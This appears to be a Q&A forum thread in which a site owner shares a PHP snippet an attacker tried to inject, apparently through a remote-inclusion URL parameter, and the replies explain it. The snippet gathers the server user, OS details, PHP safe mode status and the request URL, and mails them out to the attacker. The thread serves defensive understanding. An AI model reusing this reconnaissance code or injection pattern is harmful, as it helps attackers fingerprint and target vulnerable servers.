Script kiddie flooding my website with this snippet
Someone out here is trying to flood my website with some script. Luckily my application caught it.
I just want to know what this code is doing,
// scan inb0x hotmail v3.0
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "
Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "";
$assunto = "lup@";
$email1 = "";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
echo "Isso, ja foi!";
echo "N?o foi.";
He was trying to do something like this: mysite/index.php?dll=
This is a notification script, that is used ... to send notification mails to attackers, to find more vulnerable servers :)
EDIT: As Greg Hewgill pointed out in a comment, the fact that this has the potential to run, even if there is nothing useful to report, is a concern that shouldn't be taken lightly.
It looks like it's trying to harvest "$SafeMode" stats, for possible exploit use in the future:
$dados=("<b>Produto</b> = " . $UNAME . " // server/OS info
<i>Seguran?a</i> = " . $SafeMode . " // is PHP safe mode off? on? what?
http://" . $delet . " // full request URI
$email = ""; // who is harvesting
if(mail($email1,$assunto,$dados,$headers)){ // harvest via. mail
Dolt fails to mail back the user he looked up. Weak sauce.
Looks like this script only gathering and sending some info to
- Name of the user who executes php scripts on the server
- Name of operation system, which is installed on the server
- Is php safe mode enabled
- Also its url and script name
I think this script is only used for finding servers which can be used for attack.